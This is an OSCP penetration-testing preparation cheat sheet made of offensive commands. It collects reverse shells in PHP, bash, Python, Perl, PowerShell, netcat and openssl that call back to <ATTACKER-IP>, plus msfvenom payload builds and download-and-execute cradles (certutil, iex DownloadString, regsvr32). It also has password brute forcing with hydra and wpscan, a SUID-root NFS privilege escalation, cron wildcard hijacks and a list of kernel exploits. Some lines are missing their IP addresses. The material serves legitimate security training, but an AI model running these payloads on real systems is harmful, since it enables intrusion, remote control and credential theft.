OSCP preparation cheat sheets



A collection of publicly available cheat sheets for OSCP preparation.










Reverse Shells

Reference – adapted from various online sources, notably PayloadsAllTheThings. Placeholders such as <ATTACKER-IP>, <TARGET-IP> and <PORT> must be filled in before use.


JSP / tomcat WAR 
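# Java/JSP: drop the .war in Tomcat's manager or the .jsp in a writable webroot
msfvenom -p java/shell_reverse_tcp LHOST=<ATTACKER-IP> LPORT=4444 -f war > java4444.war
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<ATTACKER-IP> LPORT=4448 -f raw > w4448.jsp

# ASP / ASPX (IIS). windows/shell_reverse_tcp is stageless: the whole shell is in the file, a plain nc listener catches it
msfvenom -p windows/shell_reverse_tcp LHOST=<ATTACKER-IP> LPORT=4444 -f asp > shell.asp
msfvenom -p windows/shell_reverse_tcp LHOST=<ATTACKER-IP> LPORT=4444 -f aspx > shell.aspx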

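<?php /* one-shot PHP reverse shells; the HTTP request blocks until the spawned shell exits, which is expected */ ?>
<?php $cmd = shell_exec('bash -i >& /dev/tcp/<ATTACKER-IP>/<PORT> 0>&1'); echo $cmd; ?>
<?php /* Windows: nc.exe served from an attacker SMB share (\\<ATTACKER-IP>\test); single quotes keep the backslashes literal */ ?>
<?php $cmd = shell_exec('cmd /c \\\\<ATTACKER-IP>\\test\\nc.exe -e cmd.exe <ATTACKER-IP> 4444'); echo $cmd; ?>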


/usr/share/webshells/php/simple-backdoor.php (ships with Kali) – commands go in the `cmd` GET parameter, e.g. ?cmd=id

Cold FUsion 






bash -i >& /dev/tcp/ 0>&1  

mknod backpipe p && nc 4445 0<backpipe | /bin/bash 1>backpipe 

mkfifo /tmp/f2;cat /tmp/f2|/bin/sh -i |nc 4444 >/tmp/f2 

nc -e /bin/bash 4444


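# fd 3 is the socket opened by fsockopen; -i keeps the shell interactive
php -r '$sock=fsockopen("<ATTACKER-IP>",4446);exec("/bin/sh -i <&3 >&3 2>&3");'

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<ATTACKER-IP>",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

perl -e 'use Socket;$i="<ATTACKER-IP>";$p=4446;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

ruby -rsocket -e'f=TCPSocket.open("ATTACKING-IP",80).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

# telnet through a named pipe: the pipe feeds telnet's output into sh and sh's output back to telnet (the redirections were lost in the original copy)
rm -f /tmp/p; mknod /tmp/p p && telnet ATTACKING-IP 80 0</tmp/p | /bin/sh 1>/tmp/p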



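REM nc.exe executed straight from an attacker SMB share (\\<ATTACKER-IP>\test)
\\<ATTACKER-IP>\test\nc.exe -e cmd.exe <ATTACKER-IP> 4444

REM certutil as a downloader is commonly flagged by AV/EDR; fine on lab boxes, expect it to be blocked elsewhere
certutil -urlcache -f http://<ATTACKER-IP>/nc.exe nc.exe & nc.exe -e cmd.exe <ATTACKER-IP> 4444

REM start /B returns immediately, so a web shell / RCE request does not hang on the reverse shell
start /B \\<ATTACKER-IP>\test\nc.exe -e cmd.exe <ATTACKER-IP> 4444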

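# -exec bypass only lifts the script execution policy (not a security boundary); it does nothing against AMSI or Constrained Language Mode
start /B powershell.exe -exec bypass -c "$client = New-Object System.Net.Sockets.TCPClient('<ATTACKER-IP>',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..255|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

# shorter variant of the same loop (no prompt echoed back)
start /B powershell -exec bypass -c "$sm=(New-Object Net.Sockets.TCPClient('<ATTACKER-IP>',4444)).GetStream();[byte[]]$bt=0..255|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));$sm.Write($st,0,$st.Length)}"

# download-and-execute cradles: the script is never written to disk
powershell -exec bypass -c "iwr('http://<ATTACKER-IP>/shell.ps1')|iex"

powershell -exec bypass -c "iex(New-Object Net.WebClient).DownloadString('http://<ATTACKER-IP>/shell.ps1')"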

NOT tested – kept verbatim from its source; verify it in a lab before relying on it
powershell -NoP -NonI -W Hidden -Exec Bypass "& {$ps=$false;$hostip='192.168.xxx.xxx';$port=xxxx;$client = New-Object System.Net.Sockets.TCPClient($hostip,$port);$stream = $client.GetStream();[byte[]]$bytes = 0..50000|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$cmd=(get-childitem Env:ComSpec).value;$inArray=$data.split();$item=$inArray[0];if(($item -eq '$ps') -and ($ps -eq $false)){$ps=$true}if($item -like '?:'){$item='d:'}$myArray=@('cd','exit','d:','pwd','ls','ps','rm','cp','mv','cat');$do=$false;foreach ($i in $myArray){if($item -eq $i){$do=$true}}if($do -or $ps){$sendback=( iex $data 2>&1 |Out-String)}else{$data2='/c '+$data;$sendback = ( &$cmd $data2 2>&1 | Out-String)};if($ps){$prompt='PS ' + (pwd).Path}else{$prompt=(pwd).Path}$sendback2 = $data + $sendback + $prompt + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()}" 

powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.XXX.XXX/powercat.ps1');powercat -c 192.168.XXX.XXX -p 443 -e cmd"


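certutil -urlcache -f http://<ATTACKER-IP>/shell.exe shell.exe & shell.exe

REM run a DLL directly from an attacker-controlled share
rundll32.exe \\<ATTACKER-IP>\vabFG\test.dll,0

REM regsvr32 fetches and runs a .sct scriptlet over HTTP without writing it to disk ("squiblydoo")
regsvr32 /s /n /u /i:http://<ATTACKER-IP>/file.sct scrobj.dll

powershell -c "IEX((New-Object System.Net.WebClient).DownloadString('http://<ATTACKER-IP>/shell.ps1'))"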

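# MSI package carrying a meterpreter stager; start multi/handler with the same payload before running it
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ATTACKER-IP> LPORT=1234 -f msi > 1.msi
# on the target: /q quiet, /i install; msiexec accepts a local path, a UNC path or an http URL
msiexec /q /i http://<ATTACKER-IP>/1.msi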



msfconsole -x "use exploit/multi/handler; set payload linux/x86/meterpreter/reverse_tcp; set lhost tun0; set lport 4445; run -j" 


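# Stageless shells: the whole payload is in the file; catch with a plain nc listener. A reverse payload needs LHOST (our IP), not RHOST
msfvenom -p linux/x64/shell_reverse_tcp LHOST=IP LPORT=PORT -f elf > shell.elf
msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe

# Staged meterpreter: only the stager is in the file; needs multi/handler with the matching payload set
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f elf > shell.elf
msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe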

Stageless, size-restricted payload (e.g. shellcode for a buffer overflow); -b lists the bad characters the encoder must avoid
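msfvenom -p windows/exec CMD=calc.exe -b "\x00" -f py    # "\x00" is the null byte; the original "x00" would not have excluded it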

File Transfer



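# anonymous FTP server for the current directory; -w allows uploads (python3 -m pip install pyftpdlib)
python3 -m pyftpdlib -p 21 -w

# serve the current directory over HTTP (ports below 1024 need root)
sudo python3 -m http.server 80
sudo python -m SimpleHTTPServer 80    # python2

# anonymous SMB share; -smb2support is needed for Windows 10 / Server 2016+ targets that refuse SMB1
sudo impacket-smbserver -smb2support <sharename> <share path>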


From Windows

FTP Upload / Download

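REM cmd's echo writes quotes literally, so no quotes; keep a space before > or a trailing digit in the IP ("...1>ftp.txt") is parsed as a handle redirect
echo open <IP> >ftp.txt
echo user>>ftp.txt
echo pass>>ftp.txt
echo bin>>ftp.txt
echo get file.exe>>ftp.txt
echo put file.exe>>ftp.txt
echo bye>>ftp.txt

REM Windows ftp takes the script as -s:file (colon, no space)
ftp -s:ftp.txt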

HTTP Download

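certutil -urlcache -f http://<ATTACKER-IP>/shell.exe shell.exe
bitsadmin /transfer n http://domain/file c:%homepath%\file

# PowerShell: statements are separated by ';' and method arguments by ','; %homepath% is cmd syntax, PowerShell reads $env:HOMEPATH
$p = New-Object System.Net.WebClient; $p.DownloadFile("http://domain/file", "C:$env:HOMEPATH\file")
PS C:\> .\test.ps1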

SMB Upload / Download

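copy \\<IP>\share\x x
net view \\<IP>
REM a password on the command line lands in history/logs; use * instead of the password to be prompted for it
net use x: \\<IP>\share /user:example.com\userID myPassword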

Initial Enumeration


NMAP TCP quick

> sudo nmap -Pn -v -sS -sV -sC -oN tcp-quick.nmap IP


> sudo nmap -Pn -sS --stats-every 3m --max-retries 1 --max-scan-delay 20 --defeat-rst-ratelimit -T4 -p1-65535 -oN tcp-full.nmap -sV IP 

NMAP TCP – Repeat if extra ports found

> sudo nmap -Pn -v -sS -A -oN tcp-extra.nmap -p PORTS IP 

NMAP UDP quick

> sudo nmap -Pn -v -sU -sV --top-ports=30 -oN udp-quick.nmap IP


> sudo nmap -Pn --top-ports 1000 -sU --stats-every 3m --max-retries 1 -T4 -oN udp-1000.nmap IP

NMAP UDP – Repeat if extra ports found

> sudo nmap -Pn -sU -A -oN udp-extra.nmap -p PORTS IP 


FTP – Port 21

Check for FTP version vulns
Check for Anonymous login 
Check for Read access
Check for Web root or root directories of any other accessible service 
Check for write access

SSH – Port 22

Check for SSH version vulns
Check for User enumeration if necessary 
Check if host key was seen somewhere else 
Check if it prompts for a password - means password login is allowed for some users
nmap -sV --script=ssh-hostkey -p22 IP
Bruteforce if necessary with CeWL, Hydra, Patator, Crowbar, MSF (if port gets filtered, there's defense mechanisms - fail2ban) 

Telnet – Port 23

Connect and check for service running

SMTP – Port 25

Check for SMTP vulns – the banner and the response to HELO / EHLO reveal the version and extensions; try VRFY / EXPN for user enumeration

POP – PORT 110

Connect using telnet 
user <username> 
pass <pass> 
LIST - to list emails 
RETR <email number> - to retrieve an email

DNS – Port 53

Might indicate a domain controller on Windows 
Check for zone transfer - dig axfr @<IP> <domain> (the domain usually comes from the SMB/LDAP/certificate enumeration below)

Kerberos – Port 88

Indication that it's a domain controller

Netbios – Port 139

> nmblookup -A IP
> nbtscan IP 
> On older hosts, this port serves SMB / Samba over NetBIOS; if modern clients refuse to talk, add 'client min protocol = LANMAN1' to the [global] section of /etc/samba/smb.conf or use --option='client min protocol'=LANMAN1 with smbclient

RPC – PORT 135

> sudo nmap -sS -Pn -sV --script=rpcinfo.nse -p135 0 
> rpcinfo IP
> rpcclient -U "" -N [ip]

LDAP – Ports 389, 636 (LDAPS), 3268, 3269 (Global Catalog)

> sudo nmap -sS -Pn -sV --script=ldap* -p389,636,3268,3269  

WEB – PORT 80 / 443


> sudo nmap -Pn -sC -p80,443


Browse the webapp 
Check for usernames, keywords 
Check Web server vulns
Check for Cgi's shellshock
Check Certificates for hostname
Check robots.txt
Check sitemap.xml
Check for known software - View source 
Check for default credentials 
Check for input validation - SQLi
Check for OS Command execution
Check for LFI / RFI 


> dirb IP
> dirb with -X extensions based on web technology, .php,.asp,.txt,.jsp
> dirb IP -a  'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246'


> gobuster dir --url IP --wordlist /usr/share/seclists/Discovery/Web-Content/big.txt
> gobuster dir --url IP --wordlist /usr/share/seclists/Discovery/Web-Content/big.txt -k -a 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246'


> nikto -host IP

SMB – Ports

NMAP vuln scripts

> sudo nmap -Pn --script=smb-proto* -p139,445 
> sudo nmap -Pn --script=smb-os-discovery.nse -p139,445
> sudo nmap -Pn --script=smb-enum* -p139,445
> sudo nmap -Pn --script=smb-vuln* -p139,445
> nmap -p 445 -vv --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse 

Check for Null logins

> nmap --script smb-enum-shares -p 139,445 
> smbclient -L \\\\ip\\ -N 
> smbclient -m=SMB2 -L \\\\Hostname\\ -N

Connect to a share with Null session

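> smbclient '\\IP\ADMIN$' -N    # the share is ADMIN$; quote it, an unquoted $Admin is expanded by the shell as an (empty) variable
> smbmap -H IP
> smbmap -u DoesNotExists -H IP    # a non-existent user may get guest access where the null session does not
> enum4linux -a IP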

Check permissions on a connect share

> smb: \> showacls # enable acl listing
> smb: \> dir # list directories with acls

Mount share on local machine

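> sudo mount -t cifs //<IP>/<share> ~/path/to/mount_directory    # add -o username=<user> (you are prompted for the password) for authenticated shares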

List share with credentials


Recursively list all files in share

> smbmap -R -H <TARGET-IP>
> smbmap -R Replication -H <TARGET-IP>

With smbclient (recurse downloads all files)

> smbclient //<TARGET-IP>/Replication
> smb: \> recurse ON
> smb: \> prompt OFF
> smb: \> mget *

Upload / Download specific files

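> smbmap -H <TARGET-IP> --download 'Replication\active.htb\<path\to\file>'    # path is share\subpath, quoted because of the backslashes
> smbmap -H <TARGET-IP> --upload test.txt 'SHARENAME\test.txt'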

NFS – Port 2049

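> showmount -e IP    # lists exports and which hosts may mount them
> mount -t nfs -o vers=3 IP:/exported/path ~/home
> mount -t nfs4 -o proto=tcp,port=2049 IP:/exported/path mountpoint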


TFTP – Port 69 (UDP, no authentication)

> tftp client to connect
> atftp is a better client
> Can often be used to read system files, e.g. an MSSQL .mdf database file that holds password hashes; check for write access too

Finding exploits

Search on EDB and searchsploit
Check each service on CVE details for RCE / LFI / RFI / SQLI issues 
Google search the with the service banner 

Linux Command Stash

SSH Tunneling 101

# SSH local port forward to reach  an_internal_server_ip:port via server_ip
ssh tunneler@server_ip -p 2222 -L 1234:an_internal_server_ip:80 
# Now curl localhost:1234 will fetch an_internal_server_ip:80 which is reachable from server_ip only

# dynamic port forward to create a SOCKS proxy to visit any_internal_server_ip
ssh tunneler@server_ip -p 2222 -D 1080 
# next config proxychains socks4a localhost 1080; proxychains curl http://any_internal_server_ip/; which is reachable from server_ip only

# ProxyJump ssh to an_internal_host via ssh server_ip
ssh -J tunneler@server_ip:2222 whistler@an_internal_host # which is only accessible from server_ip

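# SSH remote port forward: a port on server_ip is tunnelled back to a port on our side (-R, not -L)
ssh whistler@server_ip -p 2222 -R 58671:localhost:1234
# server_ip now listens on 58671 and forwards to localhost:1234 on our box; nc -nlvp 1234 to receive, for example
# (sshd binds remote forwards to 127.0.0.1 unless GatewayPorts is enabled, so only processes on server_ip reach 58671 by default)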

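# Chain ProxyJump + dynamic port forward: SOCKS proxy into 2nd_box's network, which is reachable only via 1st_box (-J is ProxyJump; lowercase -j is not an ssh option)
ssh -J firstuser@1st_box:2222 seconduser@2nd_box -D 1080
# next: proxychains socks4a localhost 1080; proxychains curl http://any_internal_server_ip/  (reachable from 2nd_box only)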

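# bypass the first-time host key prompt from a non-interactive shell
# (this disables host key verification, i.e. MITM detection, for the connection: acceptable on a lab pivot, not on a real engagement hop)
ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" ...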

SSH reverse tunneling

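# from the pivot: reverse-forward internal services to the attacker box; -f -N backgrounds the session without opening a shell
# (the original targets were lost in the copy; each -R is listen_port:internal_host:internal_port)
ssh -f -N -R 8000:<internal-host>:80 -R 4443:<internal-host>:443 -R 33306:<internal-host>:3306 -R 33389:<internal-host>:3389 \
  -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -i key kali@<ATTACKER-IP>
# the private key stays on the pivot: use a throwaway key for this, restricted in authorized_keys (e.g. restrict,port-forwarding) so it cannot open a shell on your box

# kill with
pgrep -a ssh    # find the backgrounded tunnel's pid
kill <pid>      # TERM first; -9 only if it does not exit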

create self-signed ssl certificate

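# -nodes leaves the private key unencrypted (fine for a lab listener); the original wrapped "-days 365" across two lines
openssl req -newkey rsa:2048 -nodes -keyout my_cert.key -x509 -days 365 -out my_cert.crt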

# convert to .pem if needed:
openssl pkcs12 -export -in my_cert.crt -inkey my_cert.key -out my_cert.p12
openssl pkcs12 -in my_cert.p12 -nodes -out my_cert.pem


searchsploit -www query # show exploitdb link instead
searchsploit -x /path/to/exploit # read the exploit file
searchsploit -m /path/to/exploit # mirror exploit file to current directory

hydra web form bruteforce

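# the target host goes before the module name; the third field of the module string is the failure text (or S=... for a success text)
hydra -l admin -P ~/git/SecLists/Passwords/Leaked-Databases/rockyou-50.txt <TARGET-IP> http-post-form "/blog/admin.php:username=^USER^&password=^PASS^:Incorrect username"

hydra -l admin -P ~/git/SecLists/Passwords/Common-Credentials/10k-most-common.txt <TARGET-IP> http-post-form "/department/login.php:username=^USER^&password=^PASS^:Invalid Password" -t 64 # 64 threads; expect lockouts/rate limits at this level
# change to https-post-form for port 443 (add -s PORT for a non-default port)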

hydra ssh brute

hydra -l username -P wordlist.txt ssh <Target-IP> -s 22222

get glibc version

ldd --version

compile for 32 bit from a 64bit os, install gcc-multilib first

gcc -m32 -D_GNU_SOURCE -o suid32 suid.c

transfer files through netcat

# start listening for download
nc -nlvp 9001 > dump.txt
# start uploading from target box
nc ip port < file.txt

bruteforce zip file with fcrackzip

fcrackzip -D -p /usr/share/wordlists/rockyou.txt myplace.zip 

bruteforce zip file with john

zip2john myfile.zip > johnkey
john johnkey --wordlist=/usr/share/wordlists/rockyou.txt

port knocking on 3 ports using nmap

for x in $(echo 22 23 24);do nmap -PN --host-timeout 201 --max-retries 0 -r -p$x;done

classic gobuster

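gobuster dir -u http://<TARGET>/ -a 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3831.6 Safari/537.36' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -k -o gobuster/http-dlist-lower-small.txt    # -k skips TLS verification; the output directory must exist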

list contents of .vhd file

7z l filename.vhd

do a local port scan using SSRF

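# --hl=2 hides responses with 2 lines (the "closed port" shape here; sample a known-open and a known-closed port first and adjust)
wfuzz -c --hl=2 -z range,1-65535 'http://<TARGET>/page?url=http://127.0.0.1:FUZZ'    # FUZZ is replaced by each port number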

dump password hasshes from ntds dump file using system hive file and the dit file

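impacket-secretsdump -ntds ntds.dit -system SYSTEM.bin LOCAL    # SYSTEM hive supplies the boot key that decrypts the NTDS hashes
# tip: accounts ending in $ are machine accounts with long random passwords; crack the user accounts instead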

wpscan enum all plugins

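# never paste a real API token into a shared cheat sheet; keep it in an env var or file and read it from there
wpscan --url http://<TARGET>/ --enumerate ap --plugins-detection aggressive --force --api-token "$WPSCAN_API_TOKEN"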

wpscan brute

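wpscan --usernames tom -P /usr/share/wordlists/rockyou.txt --force --password-attack wp-login --url http://<TARGET>/ --no-update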

generate client certificate from ca.key

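# self-signs a new certificate with the leaked CA key; the subject you enter generally has to match ca.crt's subject for the server's chain check to accept it
openssl req -x509 -new -nodes -key ca.key -sha256 -days 1024 -out rh.pem
openssl pkcs12 -export -in rh.pem -inkey ca.key -out rh.p12    # .p12 bundle for importing into a browser (you are asked for an export password)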

openssl reverse shell

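mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect <ATTACKER-IP>:<PORT> > /tmp/s; rm /tmp/s
# listener (cert from the self-signed section above): openssl s_server -quiet -key my_cert.key -cert my_cert.crt -port <PORT>   - the shell traffic is TLS, unlike plain nc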

generate passwd hash with openssl

openssl passwd -1 -salt rh0x01 password123

check ASREPRoast for all domain users (without credentials)

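# -dc-ip needs the DC address before the domain/user argument (it was lost in the original copy)
while IFS= read -r user; do
  GetNPUsers.py -no-pass -dc-ip <DC-IP> htb/"$user" | grep -v Impacket
done < users.txt
# equivalent single call: GetNPUsers.py htb/ -usersfile users.txt -no-pass -dc-ip <DC-IP>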

john crack krb5asrep hash

john --format:krb5asrep alfresco.kerb --wordlist=/usr/share/wordlists/rockyou.txt

generate password wordlist with crunch

crunch 13 13 -t bev,%%@@^1995 -o wordlist.txt
# 13 13 - min max length
# bev - literal prefix the words start with
# @ will insert lower case characters
# , will insert upper case characters
# % will insert numbers
# ^ will insert symbols

mount nfs share

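mount -t nfs -o vers=3 <IP>:/exported/path ~/home

mount -t nfs4 -o proto=tcp,port=2049 <IP>:/exported/path mountpoint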

mount smb share

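sudo mount -t cifs //<IP>/'sharename' /home -o rw,vers=1.0,dir_mode=0777,file_mode=0777,nounix
# or
sudo mount -t cifs -o vers=1.0 //<IP>/'Sharename' sharemount
# vers=1.0 forces SMB1, which recent kernels disable by default; drop it (or use vers=2.0/3.0) unless the server is SMB1-only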

login to windows machine in the network with proxychains

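proxychains xfreerdp /u:admin /v:<ip_address> +clipboard    # proxychains routes RDP through the SOCKS proxy from the SSH -D tunnel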



Linux Exploits


  • DirtyCOW AddUser (Ubuntu <4.4/<3.13; Debian <4.7.8)
  • DirtyCOW Pokeball (Linux Kernel 2.6.22 < 3.9)
  • Mempodipper (Linux 2.6.39<3.2.2 Gentoo/Debian)
  • Full Nelson (Linux 2.6.31<2.6.37 RedHat/Debian)
  • Half Nelson (Linux Kernel 2.6.0<
  • Clown NewUser (Linux 3.0<3.3.5)
  • fasync_helper (Linux Kernel <2.6.28)
  • overlayfs (Linux 3.13.0<3.19)
  • pipe.c root(kit?) (Kernel 2.6.x (32 Bit only!))
  • PERF_EVENTS (Kernel 2.6.32-3.8.10)
  • CAN BCM Exploit (Kernel <2.6.36)
  • Cups local Exploit (Cups <1.1.17)


Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'ip_append_data()' Ring0 Privilege Escalation (1)
> gcc -o root 9542.c -m32 -Wl,--hash-style=both

Linux Privesc

Linux privilege escalation

Spawn Interactive Shell and set env

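python -c 'import pty;pty.spawn("/bin/bash");'
# ctrl-z to background the shell, then on the attacker side:
echo $TERM
stty -a
stty raw -echo; fg
# back in the target shell:

export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH
export TERM=xterm-256color    # the terminfo entry is xterm-256color, not xterm256-color
export SHELL=bash

stty rows <ROWS> columns <COLS>    # values from the local stty -a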

Restricted bash

perl -e 'exec "/bin/sh";'  
/bin/sh -i  
exec "/bin/sh";  
echo os.system('/bin/bash')  
/bin/sh -i  
ssh user@$ip nc $localip 4444 -e /bin/sh  
export TERM=linux 

Automated scripts

Metasploit: post/multi/recon/local_exploit_suggester (needs an existing meterpreter session); LinPEAS / LinEnum for a standalone script

Check environment

Check OS and Kernel

cat /etc/issue
cat /etc/*-release
  cat /etc/lsb-release      # Debian based
  cat /etc/redhat-release   # Redhat base

cat /proc/version
uname -a
uname -mrs
rpm -q kernel
dmesg | grep Linux
ls /boot | grep vmlinuz-

Check environment variables

cat /etc/profile
cat /etc/bashrc
cat ~/.bash_profile
cat ~/.bashrc
cat ~/.bash_logout

# Is there a printer 
lpstat -a

Check for mount restrictions on any folders

mount -l        >> any no exec or no suid?  

Check any unmounted drives  
cat /etc/fstab 

Applications and services

Running application / services

ps aux
ps -ef
cat /etc/services

ps aux | grep root
ps -ef | grep root

Installed applications – Check for vulnerable versions

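ls -alh /usr/bin/
ls -alh /sbin/
dpkg -l
rpm -qa
ls -alh /var/cache/apt/archives
ls -alh /var/cache/yum/
# pspy (pspy32 / pspy64) - watch processes and cron jobs being spawned by other users without needing root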

Application config files

cat /etc/syslog.conf
cat /etc/chttp.conf
cat /etc/lighttpd.conf
cat /etc/cups/cupsd.conf
cat /etc/inetd.conf
cat /etc/apache2/apache2.conf
cat /etc/my.conf
cat /etc/httpd/conf/httpd.conf
cat /opt/lampp/etc/httpd.conf
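ls -aRl /etc/ | awk '$1 ~ /^.*r.*/' 2>/dev/null    # readable entries (the closing quote was missing)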

Jobs / CRONS

crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root
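ls -al /var/cron.log /var/log/cron* 2>/dev/null    # check timestamps to see how often jobs run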

# If cron entries have relative paths, and If path is editable by user, cron entries can be hijacked by adding custom path to PATH variable
export PATH=/tmp:$PATH

# If Cron entris have wildcards, eg. tar with a (*)wildcard can be hijacked by using below on the folder 
touch /home/user/--checkpoint=1
touch /home/user/--checkpoint-action=exec=sh\ runme.sh

# Check permissions on cron binaries , overwrite possible? 

# Check for frequent CRONS running in bg 
# You can monitor the processes to search for processes that are being executed every 1,2 or 5 minutes. Maybe you can take advantage of it and escalate privileges. 
# For example, to monitor every 0.1s during 1 minute, sort by less executed commands and deleting the commands that have beeing executed all the time, you can do:
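# scratch file from mktemp rather than a fixed /tmp name, which another local user could pre-create or symlink
tmp=$(mktemp) && for i in $(seq 1 610); do ps -e --format cmd >> "$tmp"; sleep 0.1; done; sort "$tmp" | uniq -c | grep -v "\[" | sed '/^.\{200\}./d' | sort | grep -E -v "\s*[6-9][0-9][0-9]|\s*[0-9][0-9][0-9][0-9]"; rm -f "$tmp"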
# https://github.com/DominicBreuker/pspy 

SystemD timers
systemctl list-timers -all
# watch for recently executed timers


Network details

/sbin/ifconfig -a
cat /etc/network/interfaces
cat /etc/sysconfig/network
ip a 
ip addr

cat /etc/resolv.conf
cat /etc/sysconfig/network
cat /etc/networks
iptables -L

Existing connections

lsof -i
lsof -i :80
grep 80 /etc/services
netstat -antup
netstat -antpx
netstat -tulpn
chkconfig --list
chkconfig --list | grep 3:on

## Cached IPs 
arp -e
/sbin/route -nee

tcpdump tcp dst 80 and tcp dst 21

USER and sensitive info

cat /etc/passwd | cut -d: -f1    # List of users
grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}'   # List of super users
awk -F: '($3 == "0") {print}' /etc/passwd   # List of super users
cat /etc/sudoers
sudo -l

## Check for Sensitive info 
cat /etc/passwd
cat /etc/group
cat /etc/shadow
ls -alh /var/mail/
ls -ahlR /root/
ls -ahlR /home/

cat /var/apache2/config.inc
cat /var/lib/mysql/mysql/user.MYD
cat /root/anaconda-ks.cfg

cat ~/.bash_history
cat ~/.nano_history
cat ~/.atftp_history
cat ~/.mysql_history
cat ~/.php_history

cat ~/.ssh/authorized_keys
cat ~/.ssh/identity.pub
cat ~/.ssh/identity
cat ~/.ssh/id_rsa.pub
cat ~/.ssh/id_rsa
cat ~/.ssh/id_dsa.pub
cat ~/.ssh/id_dsa
cat /etc/ssh/ssh_config
cat /etc/ssh/sshd_config
cat /etc/ssh/ssh_host_dsa_key.pub
cat /etc/ssh/ssh_host_dsa_key
cat /etc/ssh/ssh_host_rsa_key.pub
cat /etc/ssh/ssh_host_rsa_key
cat /etc/ssh/ssh_host_key.pub
cat /etc/ssh/ssh_host_key


cat /etc/fstab
cat /etc/exports
df -h
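# NFS no_root_squash: if an export is writable and root is not squashed, a SUID-root binary written from our box as root keeps its owner and bits on the target
showmount -e MACHINE_IP
mkdir /tmp/1
mount -o rw,vers=2 MACHINE_IP:/tmp /tmp/1    # use vers=3 (or omit) if the server refuses NFSv2
# run the following as root locally so the file is owned by root; includes added because recent gcc rejects implicit setuid/setgid declarations
printf '%s\n' '#include <stdlib.h>' '#include <unistd.h>' 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/1/x.c
gcc /tmp/1/x.c -o /tmp/1/x    # must match the target's architecture/libc; try -static if it fails to run there
chmod +s /tmp/1/x
# then on the target: /tmp/x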

Which configuration files can be written in /etc/? Able to reconfigure a service?

ls -aRl /etc/ | awk '$1 ~ /^.*w.*/' 2>/dev/null     # Anyone
ls -aRl /etc/ | awk '$1 ~ /^..w/' 2>/dev/null       # Owner
ls -aRl /etc/ | awk '$1 ~ /^.....w/' 2>/dev/null    # Group
ls -aRl /etc/ | awk '$1 ~ /w.$/' 2>/dev/null        # Other

find /etc/ -readable -type f 2>/dev/null               # Anyone
find /etc/ -readable -type f -maxdepth 1 2>/dev/null   # Anyone

VAR contents 
ls -alh /var/log
ls -alh /var/mail
ls -alh /var/spool
ls -alh /var/spool/lpd
ls -alh /var/lib/pgsql
ls -alh /var/lib/mysql
cat /var/lib/dhcp3/dhclient.leases

ls -alhR /var/www/
ls -alhR /srv/www/htdocs/
ls -alhR /usr/local/www/apache22/data/
ls -alhR /opt/lampp/htdocs/
ls -alhR /var/www/html/

Check Application logs for sensitive data 
cat /etc/httpd/logs/access_log
cat /etc/httpd/logs/access.log
cat /etc/httpd/logs/error_log
cat /etc/httpd/logs/error.log
cat /var/log/apache2/access_log
cat /var/log/apache2/access.log
cat /var/log/apache2/error_log
cat /var/log/apache2/error.log
cat /var/log/apache/access_log
cat /var/log/apache/access.log
cat /var/log/auth.log
cat /var/log/chttp.log
cat /var/log/cups/error_log
cat /var/log/dpkg.log
cat /var/log/faillog
cat /var/log/httpd/access_log
cat /var/log/httpd/access.log
cat /var/log/httpd/error_log
cat /var/log/httpd/error.log
cat /var/log/lastlog
cat /var/log/lighttpd/access.log
cat /var/log/lighttpd/error.log
